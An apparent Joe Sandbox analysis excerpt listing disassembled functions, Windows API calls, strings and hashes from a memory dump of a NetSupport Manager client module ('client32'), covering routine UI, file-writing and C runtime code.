Opcode Fuzzy Hash: bc77aff694d436de89820df397cf97f2537acd50e9dcce0a0b494a4fafc6c394
Instruction Fuzzy Hash: AC318BB5A40309ABE720DF55CC86F9AF3E4FB4C708F108569E91AA7680D7B4B8008B94

Uniqueness

Uniqueness Score: -1.00%

Function 11009620 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77fileCOMMON

Download Yara Rule

APIs

Part of subcall function 110D1540: wvsprintfA.USER32(?,11195264,?), ref: 110D1572

WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110096D6
WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 110096EB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 110096E5
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009688, 110096B0
<HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009659
IsA(), xrefs: 1100968D, 110096B5

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 863766397-389219706
Opcode ID: 4ddacb77b663a9c8880eb35a92b0fe1510f4538de1884f74e96c2c9d4da9a770
Instruction ID: c29ccd5437a1998bdc0500c50b26c338a4961a37ea6a19b2fc580a4c00e0eec9
Opcode Fuzzy Hash: 4ddacb77b663a9c8880eb35a92b0fe1510f4538de1884f74e96c2c9d4da9a770
Instruction Fuzzy Hash: 5A215E75A00219ABDB00DFD5DC41FEEF3B8FF59654F10025AE922B7280EB746504CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 11002070 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32 ref: 11002094
GetSystemMetrics.USER32 ref: 110020EA
GetSystemMetrics.USER32 ref: 110020F4
GetSystemMetrics.USER32 ref: 11002109
GetSystemMetrics.USER32 ref: 11002113

Strings

NSMAnnotate, xrefs: 11002083

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MetricsSystem$AtomGlobal
String ID: NSMAnnotate
API String ID: 1775358667-1587977882
Opcode ID: 0ab50aaa82936b499c722e1eccc7d7de1002793e4e15bfd85b105029e2cc8b0f
Instruction ID: c7367c546af50a4de639236848e5e5652b6277b92aa1928d07c4543d278ba0f2
Opcode Fuzzy Hash: 0ab50aaa82936b499c722e1eccc7d7de1002793e4e15bfd85b105029e2cc8b0f
Instruction Fuzzy Hash: 2021AFB0901B549FD321DF6A8984696FBE8FFA4754F00491FD2AA87A20D7B5A440CF44

Uniqueness

Uniqueness Score: -1.00%

Function 1100B340 Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 1100B350
EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8

Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
Part of subcall function 1100A250: DeviceIoControl.KERNEL32 ref: 1100A298
Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB

waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
_free.LIBCMT ref: 1100B3C8
_free.LIBCMT ref: 1100B3CE

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
String ID:
API String ID: 705253285-0
Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64

Uniqueness

Uniqueness Score: -1.00%

Function 1101D660 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101D66E
LoadIconA.USER32 ref: 1101D6BF
LoadCursorA.USER32 ref: 1101D6CF
RegisterClassExA.USER32(00000030), ref: 1101D6F1
GetLastError.KERNEL32 ref: 1101D6F7

Strings

0, xrefs: 1101D67C

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Load$ClassCursorErrorIconLastRegister_memset
String ID: 0
API String ID: 430917334-4108050209
Opcode ID: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
Instruction ID: bb5add8fba7068f0a6842358c407e6d623dbc87194615988f67ff79f51c59528
Opcode Fuzzy Hash: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
Instruction Fuzzy Hash: E1018074C5031DABEB00DFE0CD59B9DBBB4AB0830CF004429E525BA680EBB91104CB99

Uniqueness

Uniqueness Score: -1.00%

Function 1116C548 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,111DD208,00000008,1116C650,00000000,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 1116C559
__lock.LIBCMT ref: 1116C58D

Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9

InterlockedIncrement.KERNEL32(111ECF10), ref: 1116C59A
__lock.LIBCMT ref: 1116C5AE
___addlocaleref.LIBCMT ref: 1116C5CC

Strings

KERNEL32.DLL, xrefs: 1116C554

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: c30498e3d86330ae44e1c52ec9b4aa2f09ed67631497381de44178ba0653ec91
Instruction ID: a1ea6c524cc80d8162a63b7122f67c86dce844b07e1b6a5dabb7ffb63b15338b
Opcode Fuzzy Hash: c30498e3d86330ae44e1c52ec9b4aa2f09ed67631497381de44178ba0653ec91
Instruction Fuzzy Hash: F001A175541B029FE7218FA9C844749FBE0AF51319F10890ED4A657B90CBB1A640CF11

Uniqueness

Uniqueness Score: -1.00%

Function 11003390 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32 ref: 1100339D
GetSubMenu.USER32 ref: 110033C3
DestroyMenu.USER32(00000000), ref: 110033F2

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\annotate.cpp, xrefs: 110033AE, 110033D4
hMenu, xrefs: 110033B3
hSub, xrefs: 110033D9

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9

Uniqueness

Uniqueness Score: -1.00%

Function 11003480 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32 ref: 1100348D
GetSubMenu.USER32 ref: 110034B3
DestroyMenu.USER32(00000000), ref: 110034E2

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\annotate.cpp, xrefs: 1100349E, 110034C4
hMenu, xrefs: 110034A3
hSub, xrefs: 110034C9

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
Instruction ID: f340f484bb22d03bd5e0d621a808cbfa0eacb2cd0322e49d7d14e933c66e57f7
Opcode Fuzzy Hash: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
Instruction Fuzzy Hash: 63F0EC3EF9063573D25321772C0AF8FB5844B8569DF550032FD26BEA40EE14B40146B9

Uniqueness

Uniqueness Score: -1.00%

Function 110124C0 Relevance: 9.3, APIs: 6, Instructions: 267COMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

_memmove.LIBCMT ref: 11012632
_memmove.LIBCMT ref: 1101269D

Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008E27
Part of subcall function 11008DD0: _memmove.LIBCMT ref: 11008E88

std::exception::exception.LIBCMT ref: 11012792
__CxxThrowException@8.LIBCMT ref: 110127A7
std::exception::exception.LIBCMT ref: 110127B6
__CxxThrowException@8.LIBCMT ref: 110127CB

Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$_malloc_memsetwsprintf
String ID:
API String ID: 2872708406-0
Opcode ID: c90735b767237eea5d43bdfa422c29ca45515a1b489633ae8695f8a1ec9e0fc5
Instruction ID: 1168ed0e885ae1e6c11ad6569dfe0951f8c675eec2af442d4cac6f84f2030d7e
Opcode Fuzzy Hash: c90735b767237eea5d43bdfa422c29ca45515a1b489633ae8695f8a1ec9e0fc5
Instruction Fuzzy Hash: B0A170B5D00209DFDB11CFA8C880ADEFBB8FF08314F248569E459AB285D775AA44CF90

Uniqueness

Uniqueness Score: -1.00%

Function 11016410 Relevance: 9.1, APIs: 6, Instructions: 80windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(?,0000007F,00000000,00000000,00000002,000001F4,?), ref: 11016442
GetClassLongA.USER32 ref: 1101645E
CopyIcon.USER32 ref: 11016469
SendMessageTimeoutA.USER32(?,0000007F,00000001,00000000,00000002,000001F4,00000000), ref: 1101648F
GetClassLongA.USER32 ref: 1101649F
CopyImage.USER32 ref: 110164B9

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClassCopyLongMessageSendTimeout$IconImage
String ID:
API String ID: 1346719093-0
Opcode ID: 6c95b261b42d9ef95c0244228f3fccf77e083fac3dc6cee70a1aaad8816d8880
Instruction ID: 52e36b3cc5b4867ec12e27719debc037fef8f2d782e630a2d27beabddd169e4c
Opcode Fuzzy Hash: 6c95b261b42d9ef95c0244228f3fccf77e083fac3dc6cee70a1aaad8816d8880
Instruction Fuzzy Hash: 7F110AB1BD12297BFB048A65CD46FBE739CDB85765F004269F524EA0C4EBF599004760

Uniqueness

Uniqueness Score: -1.00%

Function 11027580 Relevance: 9.1, APIs: 6, Instructions: 70threadwindowsleepCOMMON

Download Yara Rule

APIs

PostThreadMessageA.USER32 ref: 110275D2
Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
PostThreadMessageA.USER32 ref: 110275F7
WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
CloseHandle.KERNEL32(00000000,00002710,?,1102DB60,00000001), ref: 11027614
FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
String ID:
API String ID: 2375713580-0
Opcode ID: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
Instruction ID: 5d0aa2bc238e72ac38ea6d9656cf733a88b5b02fa80378034871cbc9b64e3e84
Opcode Fuzzy Hash: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
Instruction Fuzzy Hash: B1217C71A43735DBE612CBD8CCC4A76FBA8AB58B18B40013AF524C7288C770A441CF91

Uniqueness

Uniqueness Score: -1.00%

Function 111715A2 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 111715AE

Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685

__amsg_exit.LIBCMT ref: 111715CE
__lock.LIBCMT ref: 111715DE
InterlockedDecrement.KERNEL32(?), ref: 111715FB
_free.LIBCMT ref: 1117160E
InterlockedIncrement.KERNEL32(01231740), ref: 11171626

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
